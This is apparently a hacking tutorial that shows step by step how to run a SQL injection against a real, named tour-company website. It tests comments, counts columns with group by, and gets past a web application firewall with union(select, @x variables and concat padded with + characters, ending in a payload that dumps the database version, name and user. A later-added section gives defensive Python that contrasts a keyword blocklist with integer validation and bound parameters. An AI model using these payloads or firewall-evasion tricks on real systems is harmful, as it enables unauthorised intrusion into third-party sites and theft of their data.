SQL Injection Using the DIOS (Dump In One Shot) Method


Target : http://exoticindiatours.in/pckge-details.php?id=2

Now, let's start.

Finding which comment works

http://exoticindiatours.in/pckge-details.php?id=2' --+ ====> error
http://exoticindiatours.in/pckge-details.php?id=2 --   ====> no error, which means the comment (--) is working.

-- is mostly equivalent to #

So, we don't have to use any comment :))

Now it's time to find the number of columns.

First we'll use order by.

http://exoticindiatours.in/pckge-details.php?id=2 order by 122 ====> Blocked

order by is blocked, so we'll use group by instead.

http://exoticindiatours.in/pckge-details.php?id=2 group by 122 ====> shows an error, which means it's working :D

http://exoticindiatours.in/pckge-details.php?id=2 group by 2 ====> Error

http://exoticindiatours.in/pckge-details.php?id=2 group by 1 ====> No error

So the number of columns is 1.

Now it's time to use union select.

http://exoticindiatours.in/pckge-details.php?id=2 union select 1 ===> Blocked
http://exoticindiatours.in/pckge-details.php?id=2 /*!50000union*/ /*!50000select*/ ====> again blocked

It seems the site blocks special characters (*, !).

Now it's time to write the query in another form.

For this we'll use union(select

In this form, we write the columns like this: union(select (1),(2),(3),(4),(5))

Let's try it.

http://exoticindiatours.in/pckge-details.php?id=2 union(select (1)) ====> :)) working....

Now it's time to use DIOS.

As I already told you, the concat function is used to print the output of multiple queries.

http://exoticindiatours.in/pckge-details.php?id=2 union(select (concat(version(),database(),user()))

We get an error. It seems the site is blocking the comma (,).

To bypass this we'll use the variable method:

and@x:=

Let's try this:

http://exoticindiatours.in/pckge-details.php?id=2
and@x:=concat(version(),database(),user()) union(select (@x))

Again an error.

Let's test the WAF. First we'll see which word the site is blocking:

http://exoticindiatours.in/pckge-details.php?id=2
and@x:=concat====(version(),database(),user()) union(select (@x)) ===> No error

Concat( = Blocked

For this we'll use a large number of + characters.

Let's do it:

http://exoticindiatours.in/pckge-details.php?id=2
and@x:=concat+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++
(0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user())+UNION(SELECT(@x))#
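
Seen from the defender's side, the probes above get through because the filter matches keywords while the id value is still placed into the SQL text. The following is an added example, not part of the original post: Python with sqlite3 stands in for the PHP/MySQL page, and the blocklist, table and function names are constructed assumptions. It contrasts that kind of blocklist with an allow-list integer check plus a bound parameter.

```python
import re
import sqlite3

# Constructed stand-in for the keyword filter the post infers from its probes.
BLOCKLIST = ("order by", "union select", "concat(", "*", "!")

# id values copied from the requests shown in the post.
PAGE_VALUES = ["2", "2 order by 122", "2 group by 1", "2 union(select (1))"]


def blocklist_allows(value: str) -> bool:
    """Weak control: reject only if a known-bad substring is present."""
    lowered = value.lower()
    return not any(token in lowered for token in BLOCKLIST)


def strict_id(value: str):
    """Allow-list control: the whole value must be 1-9 ASCII digits."""
    return int(value) if re.fullmatch(r"[0-9]{1,9}", value) else None


def demo_db() -> sqlite3.Connection:
    """In-memory table standing in for the package table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE packages (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO packages VALUES (2, 'Sample package')")
    return conn


def fetch_package(conn: sqlite3.Connection, raw_id: str):
    """Validate first, then bind the value; SQL text never contains user input."""
    package_id = strict_id(raw_id)
    if package_id is None:
        return None  # caller should answer 400 and log the raw value
    row = conn.execute(
        "SELECT name FROM packages WHERE id = ?", (package_id,)
    ).fetchone()
    return row[0] if row else None


def compare(values=PAGE_VALUES):
    """Return (value, passes_blocklist, result_of_hardened_lookup) per input."""
    conn = demo_db()
    return [(v, blocklist_allows(v), fetch_package(conn, v)) for v in values]


if __name__ == "__main__":
    for value, passed, result in compare():
        print(f"{value!r:28} blocklist_pass={passed!s:5} hardened={result!r}")
```

Every non-numeric id is rejected before any SQL runs, regardless of which keywords it contains, so there is no list of spellings to keep up to date.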
